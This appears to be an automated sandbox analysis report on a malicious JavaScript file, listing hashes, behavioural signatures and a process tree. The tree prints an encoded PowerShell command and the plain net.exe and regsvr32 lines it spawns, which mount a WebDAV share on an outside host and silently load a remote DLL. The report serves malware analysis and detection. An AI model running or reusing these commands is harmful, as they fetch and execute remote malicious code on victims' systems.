Analysis
-
max time kernel
121s -
max time network
130s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
27/07/2024, 15:25
Static task
static1
Behavioral task
behavioral1
Sample
b1595b2d7b5f357393635666a0ea12953b1b4120aacfb10b5d9b31d53935546a.js
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
b1595b2d7b5f357393635666a0ea12953b1b4120aacfb10b5d9b31d53935546a.js
Resource
win10v2004-20240704-en
General
-
Target
b1595b2d7b5f357393635666a0ea12953b1b4120aacfb10b5d9b31d53935546a.js
-
Size
15KB
-
MD5
002c73bc923436229e3567c5c8e02f5d
-
SHA1
015114340497e712775695fb3d11b18765f8824c
-
SHA256
b1595b2d7b5f357393635666a0ea12953b1b4120aacfb10b5d9b31d53935546a
-
SHA512
a07055831de0ec321bacf94ba454ae45c87a4a06790f2badfc3743f2eba96bf2fb2c0bc6bf63a395c68ad56a51573c43720a2efb2818588727c3ad7abda522b4
-
SSDEEP
192:O1KvP37KSmYJt4aAivoRwIt4aAivoRVZyPPb1B:HvP3DNvoGUNvoLZyPPb3
Malware Config
Signatures
-
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1792 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1792 powershell.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 2544 wrote to memory of 1792 2544 wscript.exe 30 PID 2544 wrote to memory of 1792 2544 wscript.exe 30 PID 2544 wrote to memory of 1792 2544 wscript.exe 30 PID 1792 wrote to memory of 2832 1792 powershell.exe 32 PID 1792 wrote to memory of 2832 1792 powershell.exe 32 PID 1792 wrote to memory of 2832 1792 powershell.exe 32 PID 1792 wrote to memory of 2748 1792 powershell.exe 33 PID 1792 wrote to memory of 2748 1792 powershell.exe 33 PID 1792 wrote to memory of 2748 1792 powershell.exe 33 PID 1792 wrote to memory of 2748 1792 powershell.exe 33 PID 1792 wrote to memory of 2748 1792 powershell.exe 33
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\b1595b2d7b5f357393635666a0ea12953b1b4120aacfb10b5d9b31d53935546a.js1⤵
- Suspicious use of WriteProcessMemory
PID:2544 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABkAGEAaQBsAHkAdwBlAGIAcwB0AGEAdABzAC4AYwBvAG0AQAA4ADgAOAA4AFwAZABhAHYAdwB3AHcAcgBvAG8AdABcACAAOwAgAHIAZQBnAHMAdgByADMAMgAgAC8AcwAgAFwAXABkAGEAaQBsAHkAdwBlAGIAcwB0AGEAdABzAC4AYwBvAG0AQAA4ADgAOAA4AFwAZABhAHYAdwB3AHcAcgBvAG8AdABcADMAMAA5ADQANgAxADQANAA5ADUAMgA5ADYAOAA2AC4AZABsAGwA2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1792 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\dailywebstats.com@8888\davwwwroot\3⤵PID:2832
-
-
C:\Windows\system32\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s \\dailywebstats.com@8888\davwwwroot\309461449529686.dll3⤵PID:2748
-
-